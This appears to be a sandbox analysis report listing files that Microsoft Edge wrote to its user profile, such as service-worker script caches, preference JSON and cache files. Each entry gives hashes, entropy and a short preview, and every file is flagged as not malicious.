                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\ba23d8ecda68de77_0

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):164940
                                                                                                                                                                                  Entropy (8bit):5.630157520028261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:OvX5Lw5UlDJVZHL08oy6CiEETgDAGXoY7xZSrnCvnxtsmEtn4DtATIcT3PY0Ax:OvX5LKUlDJVZHL08oyRiJsD7oYb/sHn0
                                                                                                                                                                                  MD5:4118359994037A0D16DC5A6CD3BC3539
                                                                                                                                                                                  SHA1:E076C244EB8CC4D98183ADF6DEA84DC06D8DF708
                                                                                                                                                                                  SHA-256:C67597B03D7C74492916263712222C186E8FA05CA62A4722F4BE4A490146AD37
                                                                                                                                                                                  SHA-512:CEC64CD923EFAD46DCC33270683439FC3907D54337D7562904A3F94329DC5F8D7E22C15070123CDAF5B5E4CF9A2ED2D6070C4A094262679AF5DC3825233B44F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:0\r..m..................3'use strict';var aa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var ca=ba(this);function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&aa(c,a,{configurable:!0,writable:!0,value:b})}}.function ea(a){function b(d){return a.next(d)}.function c(d){return a.throw(d)}.return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(b,c).then(f,e)}.f(a.next())})}.function r(a){return ea(a())}.function fa(a,b){a instanceof String&&(a+="");var c=0,d=!1,e={next:funct

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\ba23d8ecda68de77_1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):398761
                                                                                                                                                                                  Entropy (8bit):6.109067507301838
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:C/bThfUNKKVKcgxumTvr4CIwllAC0svOf4jfkwH:CjThfUN9b9mTvdzzrvOf4zkE
                                                                                                                                                                                  MD5:3AD94E889FD7748A29B0D1F42F7DFEBA
                                                                                                                                                                                  SHA1:F73B1F5DB37652480EEBCC6968297F4E8876424D
                                                                                                                                                                                  SHA-256:79B8890771A0788FB4BBE9308F0B0A8C23A068FC4F60B5F0CD2D8F5425AB164F
                                                                                                                                                                                  SHA-512:8041CD09B2C6FD72D9ACBF2FD757F152686E53E992F202B519DA43E546B5974F5A618B3E05F7E9BD0A824C97301B9C682BD3348799572C954861C61C647CA899
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:0\r..m..................3...../...............R.......yTP........,T.11..` b.....L`X......L`......Rb.......aa...,T...`.....,L`.......}.`......Le...........................................r......(Rh2.<5....Cannot find global object......D.. ...........z..%...".. ...!..6........6......".. ...!..6......".. ...!..6......".. ...!..6........-...m...#../....-....!..k.........P..&..!......b..!..(Sb.............Rb.Q.....ba..`....Dax...n....1.Sb.`...............c..................Rb.@.6....so..`.....D..Rb..._....bb..`......Rb........Fi..`......Rb..\\....Jj..`......Rb.d......Kf..`X.....Rb.|.D....Mj..`.....D..Rb6..)....pe..`N.....Rb:.......lh..`|....D..RbB.Y.....Lf..`Z.....RbF..]....ti..`......RbJ..S....Ic..`*.....Rb6\7M....Wl..`......RbR.Ug....Wg..`x....D..Rb^@......qe..`P.....Rbb.[!....wc..`(.....Rbf0<y....Ud..`F.....Rb^x9.....Fj..`.....D..RbrTq.....Pg..`r.....Rb^.......fl..`......Rbz.3U....$d..`H.....Rb~..H....Rd..`D....D..Rbz.Ie....Zi..`......Rbr.:.....il..`......Rb........Gl..`......RbzP

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_0

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                  Entropy (8bit):6.312429469115441
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:qGUcH1qEcbuCp3bkQspksx1AJdJAS2H27X/vk5bSxSGtOHu+JEYj:qGNHrAILpksL87X/I8tBgj
                                                                                                                                                                                  MD5:74F857755872D3A533524F148B6438EE
                                                                                                                                                                                  SHA1:7CB70BEBB221B4CFC520EA9D4ACFBFDD9E363167
                                                                                                                                                                                  SHA-256:02FBF0232C2F1E632FDA15B2A0B6505D6B1351C1A2976A656D6235EA8611F360
                                                                                                                                                                                  SHA-512:5B7950C31B500340A2077E4D86FC03155F75A3C16FFCAEE8B0DED109FDB5E29FCB08AAB626C56C9E97CBBF0C2D523C20E7B4BAE23798BAAFE8666F939E3EED9D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:0\r..m..........!......2/** 7745184845366216933 */self.document = self; self.window = self;var ytcfg={d:function(){return window.yt&&yt.config_||ytcfg.data_||(ytcfg.data_={})},get:function(k,o){return k in ytcfg.d()?ytcfg.d()[k]:o},set:function(){var a=arguments;if(a.length>1)ytcfg.d()[a[0]]=a[1];else{var k;for(k in a[0])ytcfg.d()[k]=a[0][k]}}};.ytcfg.set({"EXPERIMENT_FLAGS":{"H5_enable_full_pacf_logging":true,"H5_use_async_logging":true,"ab_det_apb_b":true,"ab_det_el_h":true,"ab_det_fet_wr":true,"ab_det_fet_wr_en":true,"ab_det_gen_re":true,"action_companion_center_align_description":true,"allow_skip_networkless":true,"clear_user_partitioned_ls":true,"compress_gel":true,"csi_config_handling_infra":true,"deprecate_csi_has_info":true,"disable_child_node_auto_formatted_strings":true,"disable_pacf_logging_for_memory_limited_tv":true,"disable_simple_mixed_direction_formatted_strings":true,"disable_thumbnail_preloading":true,"embeds_transport_use_scheduler":true,"enable_ab_report_on_errorsc

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10537
                                                                                                                                                                                  Entropy (8bit):5.823496037525341
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:izNjXgnJ7Qpl5rdZ9Q7VGO9T/5eE21IDmJ0KlhhTLSSQSoSSSrCMA:SrgntQplZdgG0eE21IDmughhTLSHrkru
                                                                                                                                                                                  MD5:3A29486989EBF11F73DEEEC2BD21A71D
                                                                                                                                                                                  SHA1:2B3494B4425B368EF6D13717AF432D2BB6146F0C
                                                                                                                                                                                  SHA-256:648634777E579FC8D0116CE93E5A82245D87AE7160152713605BAB1BB8266646
                                                                                                                                                                                  SHA-512:EC6F1CE09BF5071DD519400081DBA84FDF2E4B5DD3BF7739AC71F9EB058523FFFF31AE480F493008FBA600E72C942291F1B4E7F2D986B67E8EC2E725F80BACE9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:0\r..m..........!......2...../...............R.......yT.(.......,T....`.....hL`0.....L`......Rc........ytcfg.....Rc..We....policy...............$..a............C...C...C.,T.L.`V.....L`..........Rb~P"`....yt....Rc........config_.....Rc.j;.....data_......Dm............!...-.....!...-.....!...-.....!...~.2........$Sb................`....Da............d..........`...P......H......,Q.(.4~.....https://www.youtube.com/sw.js...a........Db............D`.......A.`............,T.L..`T.....L`..........Dm............!...-....]...r....!...-....]....../..........$Sb...............`....DaH..........c..........@......<e..........................,T...`......L`................D~X..............-......n... !...-....]...../...../..4....A./...;v............-........!...-....]...../...../..4.....,.......$Sb...............`....Da......... ..f.........D......`.... ...\...e..........................,T.$.`......L`......R......v...https://www.youtube.com/s/desktop/87423d78/jsbin/serviceworker-kevlar-appshell.v

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:0\r..m..................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):96
                                                                                                                                                                                  Entropy (8bit):3.625814583693913
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:N7rPAR0q//ljf/tlWL6/tlkXg:RGl/GLuEg
                                                                                                                                                                                  MD5:70CCA2EA6413E159B0440619870CA870
                                                                                                                                                                                  SHA1:11DB00BF96A94AE453A41CA9E058CFF26F550731
                                                                                                                                                                                  SHA-256:1E43006B4739B0FC4CEAC6B3BEEB431CDA7E715F04B5BA223340953E2B51D3B7
                                                                                                                                                                                  SHA-512:67BD44DF9455169C21C62FD5CF5D88A3DF33866121B491374DB8B559FD4D73BED37E4A5CD357C0204F1FD47BB9D81A0434E53DE7A4DBB17911E3369F8569CE6C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:X...@.Loy retne........................5j.+y..L.................X....,`........i.......'..xp/.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):96
                                                                                                                                                                                  Entropy (8bit):3.625814583693913
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:N7rPAR0q//ljf/tlWL6/tlkXg:RGl/GLuEg
                                                                                                                                                                                  MD5:70CCA2EA6413E159B0440619870CA870
                                                                                                                                                                                  SHA1:11DB00BF96A94AE453A41CA9E058CFF26F550731
                                                                                                                                                                                  SHA-256:1E43006B4739B0FC4CEAC6B3BEEB431CDA7E715F04B5BA223340953E2B51D3B7
                                                                                                                                                                                  SHA-512:67BD44DF9455169C21C62FD5CF5D88A3DF33866121B491374DB8B559FD4D73BED37E4A5CD357C0204F1FD47BB9D81A0434E53DE7A4DBB17911E3369F8569CE6C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:X...@.Loy retne........................5j.+y..L.................X....,`........i.......'..xp/.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF41b64.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):96
                                                                                                                                                                                  Entropy (8bit):3.625814583693913
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:N7rPAR0q//ljf/tlWL6/tlkXg:RGl/GLuEg
                                                                                                                                                                                  MD5:70CCA2EA6413E159B0440619870CA870
                                                                                                                                                                                  SHA1:11DB00BF96A94AE453A41CA9E058CFF26F550731
                                                                                                                                                                                  SHA-256:1E43006B4739B0FC4CEAC6B3BEEB431CDA7E715F04B5BA223340953E2B51D3B7
                                                                                                                                                                                  SHA-512:67BD44DF9455169C21C62FD5CF5D88A3DF33866121B491374DB8B559FD4D73BED37E4A5CD357C0204F1FD47BB9D81A0434E53DE7A4DBB17911E3369F8569CE6C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:X...@.Loy retne........................5j.+y..L.................X....,`........i.......'..xp/.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                  Entropy (8bit):0.0018094250832613847
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zEkl3:/M/xT02zn
                                                                                                                                                                                  MD5:7A1954FD7C04C94886D0BF53D3BF37A6
                                                                                                                                                                                  SHA1:CF3DAF1D528595BA13F8895440322F769861722A
                                                                                                                                                                                  SHA-256:1780FA1B6F6BD096BD57094EC2B0C571173EE1C461539DDA6F6C3E4D51663A91
                                                                                                                                                                                  SHA-512:7D6C4E289B2631D1ED47532A21E80237E8E6A90D64C312E010B9E28B4C073E64C3C169DB95C471180D7A9194355DD31666BCCF703A32232F6EF7264D2B1D879B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                  Entropy (8bit):0.0018094250832613847
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zEkl8g:/M/xT02znj
                                                                                                                                                                                  MD5:9A03269CF5679CA69D9145212009C0E7
                                                                                                                                                                                  SHA1:D1CA8D64C063C290D7C6BE8D75B46140BA38DAA0
                                                                                                                                                                                  SHA-256:1C3A4E3879CBCFBE724F5A7857C65F6066B72DD55BCC325168C97E2C981E9E6D
                                                                                                                                                                                  SHA-512:80F75F92378362B9A7F7EC4552E07A82ADC0C13C2DADE37328DEFDE0882E863BB7BB9697FEA4211FC879275049647228AE32F1B788D91BFB79D9B97C6D896BEA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\0ed6951f-77fc-4ec0-b15a-061a99ecfe2f.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\e24969a7-4b10-4a80-934f-798d7f81b11a.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a35de734-f4c1-4c16-8dbb-325dcec29112.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10792
                                                                                                                                                                                  Entropy (8bit):5.154343594301974
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kXD3+M8pVb2/bV+FqbtwOyL1y2UIs0sD74JxUHhPcYJ:st+SIKCs/13CDNSHVb2/bGqxwPLQ2UVj
                                                                                                                                                                                  MD5:1D7F659639A07A11E8298A5A296D25EF
                                                                                                                                                                                  SHA1:DD3C9D678CCFA3FB2F9CAC708FCAC2F06E6CDD0B
                                                                                                                                                                                  SHA-256:3F685CDC415AC2E98362A4C2118034F5D8C384CF52C8008AED812933499A20C8
                                                                                                                                                                                  SHA-512:118575A4BA12F42B62443E42F8852ECCBED4956FDCC77DDE56B6F3F6ABCFDEC5EB98703D9FDEB9C2FF65B94EACC94904FD92518ED992E6F0C4D6012D9F183C44
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\0e67f47e-5d39-478e-81d4-64904038bfce\0

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with very long lines (2222)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3403059
                                                                                                                                                                                  Entropy (8bit):5.587037002028163
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:3FITo4nCn1uL0TRzNkEmFKVHL/2rcS0UmM/nDecu+0ZXKi0ghRVHXciaYkp:+Tob9LU
                                                                                                                                                                                  MD5:D66F15D779A59C62DDA84FB4A4E99DC8
                                                                                                                                                                                  SHA1:E439C396962F5B0C456AD7A9D8C5E262346260B3
                                                                                                                                                                                  SHA-256:C3C4248A6B7877F2288E9C726D7CDE3BA4A0864D83945D3EE886156A3D0B5C7A
                                                                                                                                                                                  SHA-512:1AA270DBD8D293CECDB6493878DCBAB9A7F0076A2DAA774E4E3D60BE0DF19CCB6B94DDE23FB20B5086EE45F8638EAC9962C40B987A65BA21EFE0BEFE5780A067
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;c.call(b,d.content.cloneNode(!0),a.content.firstChild);return asc=a},{mode:HD()?0:1});var csc;var dsc;var esc=ca(["background-color:",";"]),fsc=function(){return M.apply(this,arguments)||this};.n(fsc,M);fsc.prototype.computeThumbnailStyle=function(a){if(a&&(a=kC(a)))return Ph(esc,a)};.var gsc=fsc;u([N(X.YtRendererBehavior),w("design:type",Object)],gsc.prototype,"rendererBehaviors",void 0);u([P(),w("design:type",Object)],gsc.prototype,"data",void 0);gsc=u([Q({disableElementRegistration:!0,is:"ytd-hashtag-tile-renderer"})],gsc);.V(gsc,"ytd-hashtag-tile-renderer",function(){if(void 0!==dsc)return dsc;var a=document.createElement("template");L(a," css-build:shady--> css-build:shady--><div id=\"content-section\" class=\"style-scope ytd-hashtag-tile-renderer\"><div id=\"thumbnail-section\" class=\"style-scope ytd-hashtag-tile-renderer\"><a class=\"hashtag-link yt-simple-endpoint style-scope ytd-hashtag-tile-renderer\" href$=\"[[computeHref_(data.onTapCommand)]]\" data=\"[[data.onTapCo

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c4c76775-2a20-4e51-81f5-7d0ce7c2bf1f.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13968
                                                                                                                                                                                  Entropy (8bit):5.240530992022521
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:st+SPGKSuQKCs/13CDaSLlHVb2/bGqxwPLQ2UV0sDpNkYJSHj:sDOxu33CXebG5sNAD
                                                                                                                                                                                  MD5:2BCD1B08684A0C70CCFCF461D6BD9E38
                                                                                                                                                                                  SHA1:FB3F3337ACADA6D799033015F21D7DF168A4138B
                                                                                                                                                                                  SHA-256:A85E8E1F6F67376B94C1265B6C2C1B27E9E0E5BEE8422DA9AEA2D593153B3027
                                                                                                                                                                                  SHA-512:68AF09645A4EA86ABF938F38B373051C3FCD0E87FFCE5E9F5CB810D9D6039DB3B760442413235AD2699BDAB46F2A13B86EAF6AC7001A90678579CDCC6346E217
                                                                                                                                                                                  Malicious:false
